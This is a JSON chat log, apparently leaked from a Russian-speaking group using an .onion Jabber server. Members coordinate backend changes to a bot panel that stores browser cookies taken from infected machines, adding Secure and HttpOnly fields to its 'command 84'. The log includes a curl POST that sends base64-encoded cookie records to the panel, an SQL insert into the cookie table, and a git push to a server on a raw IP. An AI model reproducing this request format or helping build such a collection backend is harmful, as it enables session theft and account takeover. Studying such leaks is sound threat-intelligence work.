    "2021-08-31T10:42:41.760445": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "dlls, programs, services Я тоже уже добавил"
    },
    "2021-08-31T10:42:55.648041": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "а, ок"
    },
    "2021-08-31T10:42:55.699039": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Пока не накатил, сек сделаю"
    },
    "2021-08-31T10:44:25.981377": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию."
    },
    "2021-08-31T10:44:38.110345": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "И в бэке его тоже вроде как нет"
    },
    "2021-08-31T10:44:40.987120": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "добавляй сразу всё чтобы мне не возвращаться"
    },
    "2021-08-31T10:46:16.071160": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Пока не смогу. Ближе к вечеру время появится.\nТам нужно в других частях это поле добавлять, поэтому быстро не смогу сделать."
    },
    "2021-08-31T11:01:29.530718": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "По 2м полям в куках накатил миграции."
    },
    "2021-08-31T14:33:07.579799": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. \nВ бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет."
    },
    "2021-08-31T14:34:45.525792": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "хороший вопрос, но зуласа нету в конфе уже"
    },
    "2021-08-31T14:34:50.757509": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "потому повтори этот вопрос как он появится"
    },
    "2021-08-31T14:35:16.318990": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Оке, тут получается нет истории.."
    },
    "2021-08-31T14:35:52.754030": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "неа"
    },
    "2021-08-31T15:23:57.162928": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда"
    },
    "2021-08-31T15:24:14.679099": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "потом когда конфа будет не актуальна звездочку снимите"
    },
    "2021-09-01T05:41:44.671186": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": " > такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. \nВ бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.\n\nдля начала что за запрос ? можем мы его повторить на текущей системе чтобы я его видел ?"
    },
    "2021-09-01T06:33:17.311658": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "oad"
    },
    "2021-09-01T13:51:45.508840": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "К сожалению не можем.\nЕсли с этим серверм будет такое же история я напишу"
    },
    "2021-09-01T13:52:07.167823": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Как повторить к сожалению не знаю пока"
    },
    "2021-09-02T11:28:45.763749": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "всем привет"
    },
    "2021-09-02T11:28:50.925843": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "как дела с деро?"
    },
    "2021-09-02T11:29:03.158294": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas: понятна проблема?"
    },
    "2021-09-02T11:30:43.884505": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "деф . привет .. а в чем проблема ?"
    },
    "2021-09-02T11:33:13.544762": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "driver: отпиши что ты мне написал сюда"
    },
    "2021-09-02T11:33:20.364196": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ответ 403 был"
    },
    "2021-09-02T11:33:26.027214": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "с ним разобрались?"
    },
    "2021-09-02T11:36:33.217572": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Бэк отвечает 403 на попытку отправить куки."
    },
    "2021-09-02T11:36:55.084933": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Внесли ли изменения связанные с новыми полями?"
    },
    "2021-09-02T11:38:21.045624": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "давайте конкретно: кто и что должен внести?"
    },
    "2021-09-02T11:38:32.054141": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "тк походу зулас даже не в курсе"
    },
    "2021-09-02T11:39:06.180635": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "4ый день мы тут что то обсуждаем, а в итоге ничего не делаем"
    },
    "2021-09-02T11:39:10.284607": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "в чем проблема?"
    },
    "2021-09-02T11:39:34.330577": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Нужно в 84 команду внести 2 поля.\nsecure, httponly в конец приема, получается 9 и 10 поле должно быть."
    },
    "2021-09-02T11:39:51.361952": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "В базу должны записываться поля с такими же именами"
    },
    "2021-09-02T11:41:12.881705": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "я ничего не вносил пока .."
    },
    "2021-09-02T11:41:48.450642": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "так уже пора внести"
    },
    "2021-09-02T11:41:53.196704": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "драйвер же просил"
    },
    "2021-09-02T11:42:05.655109": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "у нас доработка прямо сейчас в модуле сбора, требует этого"
    },
    "2021-09-02T11:42:10.207522": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Ок. Когда?"
    },
    "2021-09-02T11:43:37.294831": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Я не стал этого делать потому что мне сказали, что сейчас zulas занимается бэком, но я напрямую не писал задачу.\nВозможно решил что вы с кодером модуля обсудили этот момент"
    },
    "2021-09-02T11:44:33.238098": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "(31.08.2021 13:44:35) zulas: добавляй сразу всё чтобы мне не возвращаться\n(31.08.2021 13:46:11) driver: Пока не смогу. Ближе к вечеру время появится.\nТам нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.\n(31.08.2021 14:01:24) driver: По 2м полям в куках накатил миграции."
    },
    "2021-09-02T11:44:45.184787": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ну вообще надо все сразу сделать и чтобы не возвращаться"
    },
    "2021-09-02T11:44:52.286027": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "переключение контекста -- очень тяжелая операция )"
    },
    "2021-09-02T11:45:14.307129": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "так что \n1. я жду когда в базу нужное внесется\n2. когда мне будет объяснено что нужно делать"
    },
    "2021-09-02T11:59:16.916864": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "так а по-моему driver говорил что накатил миграции на базу. Это не оно?\nцитату не приведу, уплыло в истории"
    },
    "2021-09-02T12:03:26.094441": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "driver: поясни мне чего ты ждешь?"
    },
    "2021-09-02T12:03:33.365118": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "что нужно от зуласа?"
    },
    "2021-09-02T12:11:37.701630": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Дело в том что миграция по десктопу относится к другой задаче."
    },
    "2021-09-02T12:11:51.017564": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Сейчас нужно сделать 2 этих поля"
    },
    "2021-09-02T12:12:18.871825": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas: сделаешь?"
    },
    "2021-09-02T12:14:06.097999": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Более того к другой команде и к другой таблице."
    },
    "2021-09-02T12:15:43.896252": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "@driver давай конкретно что тебе надо и куда ... ок ?"
    },
    "2021-09-02T12:17:36.624084": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Нужно в 84 команду внести 2 поля.\nsecure, httponly в конец приема, получается 9 и 10 поле должно быть."
    },
    "2021-09-02T12:18:22.059558": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "На запрос вида \ncurl -X POST -F 'data=dXNlcg==|IE||||1240428288|1240428288|dXNlcg==|IE|demdex.net|ZGVtZGV4|NTczODQzMjMyMTAwNDg1MDEyMDI3NjIxMTIxODA0ODI1OTMyMjQ=|1240428358|1240428358|Lw==|1|1' http://(IP)/TAG/TEST_W639600.1234A242341C6D1A25B3F315D688968E/84/\nДолжно ответить /1/"
    },
    "2021-09-02T12:20:09.146624": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ок .. сейчас в базе поля уже есть ?"
    },
    "2021-09-02T12:20:19.950690": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Да"
    },
    "2021-09-02T12:28:19.571799": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "а старые клиенты еще работают ?"
    },
    "2021-09-02T12:28:40.295678": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "т.е. надо поддерживать и старый формат и новый ?"
    },
    "2021-09-02T12:29:44.533930": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Нет, просто только новый должен начать работать."
    },
    "2021-09-02T12:30:37.242905": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Уже внесли нужные изменения для клиентов. Ждем именно чтобы подхватило эти изменения часть по бэку"
    },
    "2021-09-02T12:59:04.946169": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas: очень прошу поторопиться, так как сейчас от тебя зависит работа многих, без правок бекенда не можем дальше двинуться"
    },
    "2021-09-02T13:03:56.541709": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "хорошо сделаю"
    },
    "2021-09-02T13:23:09.878741": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "[ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path, Secure, HttpOnly ]"
    },
    "2021-09-02T13:23:13.463396": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "такая последовательность ?"
    },
    "2021-09-02T13:23:20.882931": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "@driver"
    },
    "2021-09-02T13:26:57.390905": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "@defender как мне запушить изменения ?"
    },
    "2021-09-02T13:37:09.262748": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Да все верно."
    },
    "2021-09-02T14:18:44.637884": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas: а я тебе вроде выдавал доступ, разве нет?"
    },
    "2021-09-02T16:43:17.461565": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "я его 100 раз забыл"
    },
    "2021-09-02T16:43:37.840672": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "~/erl/dero> git -c credential.helper=/usr/share/smartgit/lib/credentials.sh push --porcelain --progress --recurse-submodules=check origin refs/heads/master:refs/heads/master\nunable to access 'https://179.43.147.243/begemot/dero.git/': gnutls_handshake() failed: Internal error"
    },
    "2021-09-02T16:44:19.025716": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "ок, щас в личку кину"
    },
    "2021-09-03T09:27:34.711830": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Добрый день! Как успехи по пушу кода?"
    },
    "2021-09-03T09:28:03.406719": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "@zulas @defender"
    },
    "2021-09-03T09:28:22.266032": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "надо запушить . жду дефа"
    },
    "2021-09-03T09:31:17.969983": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Ок"
    },
    "2021-09-03T11:49:56.201664": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "А есть вариант просто на сервер залить этот код пока что?"
    },
    "2021-09-03T11:50:22.707347": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Чтобы мы потестили, а с гитом позже разобраться7"
    },
    "2021-09-03T11:57:50.004477": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "зулас запушил"
    },
    "2021-09-03T11:57:56.218562": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "я его попросил выгрузить на сервер"
    },
    "2021-09-03T11:58:32.837272": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": " driver или ты выгрузи сам"
    },
    "2021-09-03T12:17:17.912828": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Ок"
    },
    "2021-09-03T12:17:26.286310": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Выгружу."
    },
    "2021-09-03T12:54:25.746759": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "SQL = \"INSERT INTO data84 (created_at, \\\"group\\\", id_low, id_high, username, browser, \\\"domain\\\", cookie_name, cookie_value, created, expires, path ) VALUES ( NOW(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13 )\","
    },
    "2021-09-03T12:55:03.222718": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "@zulas не вставил 2 поля в запрос в базу."
    },
    "2021-09-03T12:55:17.838265": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "Поправь пожалуйста."
    },
    "2021-09-03T13:02:44.310804": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "И таблицу архива куков, там тоже эти 2 поля нужны будут."
    },
    "2021-09-03T13:03:34.029973": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "По остальному посмотрел, вижу схему нормальную сделал, все ок. Это у нас недавно было актуальной проблемой."
    },
    "2021-09-03T13:04:19.048670": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "cookies_archive*"
    },
    "2021-09-03T13:23:45.184379": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "zulas отпиши по времени, когда сможешь сделать фиксы"
    },
    "2021-09-03T13:44:34.798653": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "щас посмотрю"
    },
    "2021-09-03T13:46:05.461942": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "@driver cookies_archive* .. я такой таблицей не пользуюсь"
    },
    "2021-09-03T13:56:14.445800": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "пофиксил запрос"
    },
    "2021-09-03T13:56:17.185701": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "не тестировал"
    },
    "2021-09-04T06:50:20.176437": {
        "src": "ttrr@conference.q3mcco35auwcstmt.onion",
        "dst": "flip@q3mcco35auwcstmt.onion",
        "body": "сегодня отдых у всех ?"
    }
}